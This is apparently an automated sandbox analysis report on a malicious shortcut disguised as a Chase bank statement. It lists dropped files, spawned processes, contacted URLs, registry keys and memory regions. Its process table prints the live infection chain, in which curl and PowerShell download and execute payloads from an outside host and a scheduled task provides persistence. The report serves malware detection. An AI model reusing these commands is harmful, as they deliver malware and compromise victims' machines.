Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
chasebank_statement_mar.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=13, Archive, ctime=Wed Oct 6 12:52:37 2021, mtime=Wed Mar 27 01:07:39 2024, atime=Wed Oct 6
12:52:37 2021, length=289792, window=hidenormalshowminimized
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat
|
ASCII text, with no line terminators
|
modified
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ehs5zhc.dsd.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b33eckjg.iyd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bg3pbtwh.dsy.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gb2rsywu.plq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i0bkzy0a.aty.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mcjwrrpk.mku.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF4dac66.TMP
(copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF4e9280.TMP
(copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6K4PEVODYN5YNNE2QJM7.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GWV6LD4PZW7H8D7URH4J.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PY5XP514LH93HD6U40HK.temp
|
data
|
dropped
|
||
|
\Device\ConDrv
|
ASCII text, with CR, LF line terminators
|
dropped
|
There are 7 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" &
schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2
/mo 1
|
|
|
|
C:\Windows\System32\schtasks.exe
|
schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2
/mo 1
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat"" qWQnYbiCKtrx1y2
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js';
schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js"
|
|
|
|
C:\Windows\System32\schtasks.exe
|
"C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat"" qWQnYbiCKtrx1y2
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js';
schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js"
|
|
|
|
C:\Windows\System32\schtasks.exe
|
"C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat"" qWQnYbiCKtrx1y2
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js';
schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js"
|
|
|
|
C:\Windows\System32\schtasks.exe
|
"C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\curl.exe
|
curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php"
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 12 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php
|
103.26.141.28
|
|
|
|
https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php
|
103.26.141.28
|
|
|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://admiralpub.ca/wp-content/
|
unknown
|
|
|
|
https://admiralpub.ca
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://admiralpub.ca
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://admiralpub.ca/wp-content/uploads/2017/olympiadic.phplW
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://crl.microsoft8
|
unknown
|
||
|
https://admiralpub.ca/wp-content/uploads/2017/olympiadic.phpY
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://admiralpub.ca/wp-content/uploads/2017/agent1.ps1
|
unknown
|
||
|
http://crl.m
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://admiralpub.ca/wp-content/uploads/2017/agent3.ps1
|
unknown
|
||
|
https://oneget.org
|
unknown
|
There are 15 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
admiralpub.ca
|
103.26.141.28
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
103.26.141.28
|
admiralpub.ca
|
Canada
|
|
|
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
281D9E2C000
|
heap
|
page read and write
|
||
|
27A00001000
|
trusted library allocation
|
page read and write
|
||
|
7FF849120000
|
trusted library allocation
|
page read and write
|
||
|
1DDF6105000
|
heap
|
page read and write
|
||
|
217B91B6000
|
heap
|
page read and write
|
||
|
1216A240000
|
heap
|
page read and write
|
||
|
2AD6D650000
|
heap
|
page read and write
|
||
|
2AD6F420000
|
heap
|
page execute and read and write
|
||
|
281D9E14000
|
heap
|
page read and write
|
||
|
217B91AB000
|
heap
|
page read and write
|
||
|
217B93B5000
|
heap
|
page read and write
|
||
|
281DB7E4000
|
heap
|
page read and write
|
||
|
217B91FE000
|
heap
|
page read and write
|
||
|
217B91F7000
|
heap
|
page read and write
|
||
|
217B91FA000
|
heap
|
page read and write
|
||
|
2AD0163D000
|
trusted library allocation
|
page read and write
|
||
|
258B0FE2000
|
heap
|
page read and write
|
||
|
281D9DEF000
|
heap
|
page read and write
|
||
|
217B9160000
|
heap
|
page read and write
|
||
|
893307E000
|
stack
|
page read and write
|
||
|
7FF848FE2000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FD2000
|
trusted library allocation
|
page read and write
|
||
|
23F41220000
|
trusted library allocation
|
page read and write
|
||
|
893327B000
|
stack
|
page read and write
|
||
|
4787A7D000
|
stack
|
page read and write
|
||
|
217B91BF000
|
heap
|
page read and write
|
||
|
23F4465D000
|
trusted library allocation
|
page read and write
|
||
|
27A66310000
|
heap
|
page read and write
|
||
|
18434FE000
|
stack
|
page read and write
|
||
|
23F446B2000
|
trusted library allocation
|
page read and write
|
||
|
1216A289000
|
heap
|
page read and write
|
||
|
217B91A1000
|
heap
|
page read and write
|
||
|
7FF848DFD000
|
trusted library allocation
|
page execute and read and write
|
||
|
217B91F2000
|
heap
|
page read and write
|
||
|
2AD6F293000
|
trusted library allocation
|
page read and write
|
||
|
1DDF5F40000
|
heap
|
page read and write
|
||
|
1216A288000
|
heap
|
page read and write
|
||
|
27A67D50000
|
heap
|
page readonly
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
281D9E24000
|
heap
|
page read and write
|
||
|
281D9E14000
|
heap
|
page read and write
|
||
|
1216A295000
|
heap
|
page read and write
|
||
|
27A68690000
|
heap
|
page read and write
|
||
|
217B91D8000
|
heap
|
page read and write
|
||
|
217B91A1000
|
heap
|
page read and write
|
||
|
F7C47FF000
|
stack
|
page read and write
|
||
|
1216BCE4000
|
heap
|
page read and write
|
||
|
2AD6D3CB000
|
heap
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
23F411A6000
|
heap
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
893337E000
|
stack
|
page read and write
|
||
|
281DA095000
|
heap
|
page read and write
|
||
|
2AD6F51A000
|
heap
|
page read and write
|
||
|
1216A230000
|
heap
|
page read and write
|
||
|
F776BFE000
|
stack
|
page read and write
|
||
|
258B0F10000
|
heap
|
page read and write
|
||
|
217BB030000
|
heap
|
page read and write
|
||
|
7FF849000000
|
trusted library allocation
|
page read and write
|
||
|
27A01B4C000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
47888CE000
|
stack
|
page read and write
|
||
|
258B0F80000
|
heap
|
page read and write
|
||
|
7FF849100000
|
trusted library allocation
|
page read and write
|
||
|
281D9DFF000
|
heap
|
page read and write
|
||
|
F77757B000
|
stack
|
page read and write
|
||
|
1216A2AD000
|
heap
|
page read and write
|
||
|
7FF848E04000
|
trusted library allocation
|
page read and write
|
||
|
89343CD000
|
stack
|
page read and write
|
||
|
2AD6F617000
|
heap
|
page execute and read and write
|
||
|
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
|
1216A2F8000
|
heap
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
281D9E1B000
|
heap
|
page read and write
|
||
|
27A6630E000
|
heap
|
page read and write
|
||
|
27A01608000
|
trusted library allocation
|
page read and write
|
||
|
27A0163E000
|
trusted library allocation
|
page read and write
|
||
|
893434E000
|
stack
|
page read and write
|
||
|
27A6845C000
|
heap
|
page read and write
|
||
|
281D9DF1000
|
heap
|
page read and write
|
||
|
7FF848DF3000
|
trusted library allocation
|
page execute and read and write
|
||
|
8933538000
|
stack
|
page read and write
|
||
|
7FF849140000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
47876FE000
|
stack
|
page read and write
|
||
|
7FF848ED6000
|
trusted library allocation
|
page execute and read and write
|
||
|
23F41250000
|
trusted library allocation
|
page read and write
|
||
|
8932D74000
|
stack
|
page read and write
|
||
|
1216A430000
|
heap
|
page read and write
|
||
|
1216A2BD000
|
heap
|
page read and write
|
||
|
2AD6F741000
|
heap
|
page read and write
|
||
|
2AD01B4C000
|
trusted library allocation
|
page read and write
|
||
|
89336BF000
|
stack
|
page read and write
|
||
|
281D9D80000
|
heap
|
page read and write
|
||
|
1216C128000
|
heap
|
page read and write
|
||
|
23F41161000
|
heap
|
page read and write
|
||
|
217B9280000
|
heap
|
page read and write
|
||
|
27A664F0000
|
heap
|
page read and write
|
||
|
1E115150000
|
heap
|
page read and write
|
||
|
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
|
23F5B270000
|
heap
|
page read and write
|
||
|
281DA090000
|
heap
|
page read and write
|
||
|
2AD6F3E0000
|
trusted library allocation
|
page read and write
|
||
|
281D9E1B000
|
heap
|
page read and write
|
||
|
281D9DD7000
|
heap
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1216A435000
|
heap
|
page read and write
|
||
|
1B4C47F000
|
unkown
|
page read and write
|
||
|
F776EFE000
|
stack
|
page read and write
|
||
|
1FFDE3B8000
|
heap
|
page read and write
|
||
|
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
|
2AD6F430000
|
heap
|
page read and write
|
||
|
2AD00C2C000
|
trusted library allocation
|
page read and write
|
||
|
217B91F2000
|
heap
|
page read and write
|
||
|
258B0FE2000
|
heap
|
page read and write
|
||
|
23F43000000
|
heap
|
page execute and read and write
|
||
|
23F530ED000
|
trusted library allocation
|
page read and write
|
||
|
27A66340000
|
heap
|
page read and write
|
||
|
27A00C2B000
|
trusted library allocation
|
page read and write
|
||
|
27A664F5000
|
heap
|
page read and write
|
||
|
27A664C0000
|
trusted library allocation
|
page read and write
|
||
|
258B0FB9000
|
heap
|
page read and write
|
||
|
27A685B0000
|
heap
|
page read and write
|
||
|
893343F000
|
stack
|
page read and write
|
||
|
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
|
281D9DD7000
|
heap
|
page read and write
|
||
|
47879FE000
|
stack
|
page read and write
|
||
|
1216A2D3000
|
heap
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page read and write
|
||
|
2AD6F73C000
|
heap
|
page read and write
|
||
|
2AD10011000
|
trusted library allocation
|
page read and write
|
||
|
2AD015EA000
|
trusted library allocation
|
page read and write
|
||
|
893363E000
|
stack
|
page read and write
|
||
|
7FF849130000
|
trusted library allocation
|
page read and write
|
||
|
23F5B170000
|
heap
|
page read and write
|
||
|
2AD10068000
|
trusted library allocation
|
page read and write
|
||
|
1E115230000
|
heap
|
page read and write
|
||
|
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
217B91FA000
|
heap
|
page read and write
|
||
|
F77717D000
|
stack
|
page read and write
|
||
|
281D9E24000
|
heap
|
page read and write
|
||
|
1216A309000
|
heap
|
page read and write
|
||
|
89342CF000
|
stack
|
page read and write
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
18435FE000
|
stack
|
page read and write
|
||
|
1216A2C3000
|
heap
|
page read and write
|
||
|
7FF848FBA000
|
trusted library allocation
|
page read and write
|
||
|
1FFDE6B5000
|
heap
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
27A018C9000
|
trusted library allocation
|
page read and write
|
||
|
4787AF8000
|
stack
|
page read and write
|
||
|
23F411A0000
|
heap
|
page read and write
|
||
|
1216A2DB000
|
heap
|
page read and write
|
||
|
7FF848EAC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
23F4467C000
|
trusted library allocation
|
page read and write
|
||
|
478767E000
|
stack
|
page read and write
|
||
|
258B0FD2000
|
heap
|
page read and write
|
||
|
281DBB40000
|
heap
|
page read and write
|
||
|
258B0F97000
|
heap
|
page read and write
|
||
|
281D9DCC000
|
heap
|
page read and write
|
||
|
4788A8C000
|
stack
|
page read and write
|
||
|
258B0FFB000
|
heap
|
page read and write
|
||
|
478797F000
|
stack
|
page read and write
|
||
|
27A66288000
|
heap
|
page read and write
|
||
|
1216A2D3000
|
heap
|
page read and write
|
||
|
2AD6D3CD000
|
heap
|
page read and write
|
||
|
F77707B000
|
stack
|
page read and write
|
||
|
258B0F9D000
|
heap
|
page read and write
|
||
|
27A66378000
|
heap
|
page read and write
|
||
|
217BACE0000
|
heap
|
page read and write
|
||
|
2AD6D332000
|
heap
|
page read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
27A66380000
|
heap
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
217B920E000
|
heap
|
page read and write
|
||
|
2AD6D374000
|
heap
|
page read and write
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
281D9DD7000
|
heap
|
page read and write
|
||
|
281DBB48000
|
heap
|
page read and write
|
||
|
2AD6D585000
|
heap
|
page read and write
|
||
|
1216DB30000
|
heap
|
page read and write
|
||
|
2AD6F515000
|
heap
|
page read and write
|
||
|
89344CC000
|
stack
|
page read and write
|
||
|
F7C42FE000
|
stack
|
page read and write
|
||
|
27A67DE3000
|
trusted library allocation
|
page read and write
|
||
|
281D9E14000
|
heap
|
page read and write
|
||
|
217B91DA000
|
heap
|
page read and write
|
||
|
27A6637E000
|
heap
|
page read and write
|
||
|
1DDF5D40000
|
heap
|
page read and write
|
||
|
23F446B0000
|
trusted library allocation
|
page read and write
|
||
|
97D23FE000
|
stack
|
page read and write
|
||
|
281D9E21000
|
heap
|
page read and write
|
||
|
27A0186E000
|
trusted library allocation
|
page read and write
|
||
|
2AD01C16000
|
trusted library allocation
|
page read and write
|
||
|
1842FFE000
|
stack
|
page read and write
|
||
|
F776B34000
|
stack
|
page read and write
|
||
|
F7C45FE000
|
stack
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1216A2F8000
|
heap
|
page read and write
|
||
|
4787B77000
|
stack
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
F7774FB000
|
stack
|
page read and write
|
||
|
4787EFB000
|
stack
|
page read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
|
258B0F87000
|
heap
|
page read and write
|
||
|
2AD6F4D2000
|
heap
|
page read and write
|
||
|
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
|
281D9E14000
|
heap
|
page read and write
|
||
|
1FFDE6B0000
|
heap
|
page read and write
|
||
|
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
|
2AD015D0000
|
trusted library allocation
|
page read and write
|
||
|
27A0162E000
|
trusted library allocation
|
page read and write
|
||
|
F77747F000
|
stack
|
page read and write
|
||
|
217B91AA000
|
heap
|
page read and write
|
||
|
27A66352000
|
heap
|
page read and write
|
||
|
1B4C4FE000
|
stack
|
page read and write
|
||
|
258B0FFB000
|
heap
|
page read and write
|
||
|
2AD00001000
|
trusted library allocation
|
page read and write
|
||
|
281D9E1B000
|
heap
|
page read and write
|
||
|
1DDF5F20000
|
heap
|
page read and write
|
||
|
258B0FB9000
|
heap
|
page read and write
|
||
|
258B0EF0000
|
remote allocation
|
page read and write
|
||
|
27A68431000
|
heap
|
page read and write
|
||
|
27A6869A000
|
heap
|
page read and write
|
||
|
2AD6D510000
|
heap
|
page read and write
|
||
|
23F41100000
|
heap
|
page read and write
|
||
|
478777E000
|
stack
|
page read and write
|
||
|
4787395000
|
stack
|
page read and write
|
||
|
F77808E000
|
stack
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
23F5B277000
|
heap
|
page read and write
|
||
|
7FF84913D000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DF2000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
|
27A68708000
|
heap
|
page read and write
|
||
|
23F40F00000
|
heap
|
page read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page execute and read and write
|
||
|
1216A2EE000
|
heap
|
page read and write
|
||
|
1216A2F8000
|
heap
|
page read and write
|
||
|
1216A281000
|
heap
|
page read and write
|
||
|
27A68586000
|
heap
|
page execute and read and write
|
||
|
281D9DA0000
|
heap
|
page read and write
|
||
|
2AD6F750000
|
heap
|
page read and write
|
||
|
F77818C000
|
stack
|
page read and write
|
||
|
258B0FA0000
|
heap
|
page read and write
|
||
|
217B91F2000
|
heap
|
page read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
281D9DC1000
|
heap
|
page read and write
|
||
|
27A67E75000
|
heap
|
page read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
217B91B6000
|
heap
|
page read and write
|
||
|
258B0FBA000
|
heap
|
page read and write
|
||
|
1216A2BE000
|
heap
|
page read and write
|
||
|
27A015FF000
|
trusted library allocation
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
23F5B2BB000
|
heap
|
page read and write
|
||
|
1E11525E000
|
heap
|
page read and write
|
||
|
7FF849000000
|
trusted library allocation
|
page read and write
|
||
|
281D9EA0000
|
heap
|
page read and write
|
||
|
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
|
258B0FFB000
|
heap
|
page read and write
|
||
|
89331FE000
|
stack
|
page read and write
|
||
|
F7C43FE000
|
stack
|
page read and write
|
||
|
281D9E1B000
|
heap
|
page read and write
|
||
|
281D9E24000
|
heap
|
page read and write
|
||
|
1B4C18B000
|
stack
|
page read and write
|
||
|
23F4329C000
|
trusted library allocation
|
page read and write
|
||
|
27A015D0000
|
trusted library allocation
|
page read and write
|
||
|
27A1007C000
|
trusted library allocation
|
page read and write
|
||
|
893420E000
|
stack
|
page read and write
|
||
|
27A10001000
|
trusted library allocation
|
page read and write
|
||
|
23F41040000
|
heap
|
page read and write
|
||
|
1E115274000
|
heap
|
page read and write
|
||
|
23F41295000
|
heap
|
page read and write
|
||
|
1216A2D3000
|
heap
|
page read and write
|
||
|
7FF848FBF000
|
trusted library allocation
|
page read and write
|
||
|
89333F9000
|
stack
|
page read and write
|
||
|
893418E000
|
stack
|
page read and write
|
||
|
23F43C9C000
|
trusted library allocation
|
page read and write
|
||
|
1216A29E000
|
heap
|
page read and write
|
||
|
27A66336000
|
heap
|
page read and write
|
||
|
258B0F94000
|
heap
|
page read and write
|
||
|
2AD01339000
|
trusted library allocation
|
page read and write
|
||
|
7FF84902F000
|
trusted library allocation
|
page read and write
|
||
|
217B9204000
|
heap
|
page read and write
|
||
|
1216DCB0000
|
trusted library allocation
|
page read and write
|
||
|
217B91BE000
|
heap
|
page read and write
|
||
|
217B9080000
|
heap
|
page read and write
|
||
|
27A01843000
|
trusted library allocation
|
page read and write
|
||
|
B58D6FF000
|
stack
|
page read and write
|
||
|
2AD6D540000
|
heap
|
page read and write
|
||
|
27A01C15000
|
trusted library allocation
|
page read and write
|
||
|
217B91A9000
|
heap
|
page read and write
|
||
|
97D29FF000
|
stack
|
page read and write
|
||
|
D278CB000
|
stack
|
page read and write
|
||
|
47878FB000
|
stack
|
page read and write
|
||
|
23F410C2000
|
heap
|
page read and write
|
||
|
23F5B313000
|
heap
|
page read and write
|
||
|
8932DFE000
|
stack
|
page read and write
|
||
|
1216A2E5000
|
heap
|
page read and write
|
||
|
1FFDE330000
|
heap
|
page read and write
|
||
|
2AD6F765000
|
heap
|
page read and write
|
||
|
F77737B000
|
stack
|
page read and write
|
||
|
2AD6F640000
|
heap
|
page read and write
|
||
|
281DD5B0000
|
heap
|
page read and write
|
||
|
281D9E18000
|
heap
|
page read and write
|
||
|
1216C120000
|
heap
|
page read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
2AD015F9000
|
trusted library allocation
|
page read and write
|
||
|
1842EFE000
|
stack
|
page read and write
|
||
|
23F411F0000
|
trusted library allocation
|
page read and write
|
||
|
F77828D000
|
stack
|
page read and write
|
||
|
27A101B2000
|
trusted library allocation
|
page read and write
|
||
|
217B91A8000
|
heap
|
page read and write
|
||
|
23F4465F000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
217B91FA000
|
heap
|
page read and write
|
||
|
23F4493E000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848EE6000
|
trusted library allocation
|
page execute and read and write
|
||
|
27A0022B000
|
trusted library allocation
|
page read and write
|
||
|
27A66280000
|
heap
|
page read and write
|
||
|
F7C48FE000
|
stack
|
page read and write
|
||
|
1216A2EB000
|
heap
|
page read and write
|
||
|
27A01C11000
|
trusted library allocation
|
page read and write
|
||
|
27A015F7000
|
trusted library allocation
|
page read and write
|
||
|
2AD019B8000
|
trusted library allocation
|
page read and write
|
||
|
23F4466C000
|
trusted library allocation
|
page read and write
|
||
|
281D9E02000
|
heap
|
page read and write
|
||
|
1216A295000
|
heap
|
page read and write
|
||
|
23F41159000
|
heap
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page read and write
|
||
|
1216A260000
|
heap
|
page read and write
|
||
|
1DDF6100000
|
heap
|
page read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
27A10011000
|
trusted library allocation
|
page read and write
|
||
|
4788B0E000
|
stack
|
page read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page execute and read and write
|
||
|
A7CCCFF000
|
stack
|
page read and write
|
||
|
1216A2DB000
|
heap
|
page read and write
|
||
|
281DD6D0000
|
trusted library allocation
|
page read and write
|
||
|
F777276000
|
stack
|
page read and write
|
||
|
7FF849100000
|
trusted library allocation
|
page read and write
|
||
|
18432FF000
|
stack
|
page read and write
|
||
|
1216A2BE000
|
heap
|
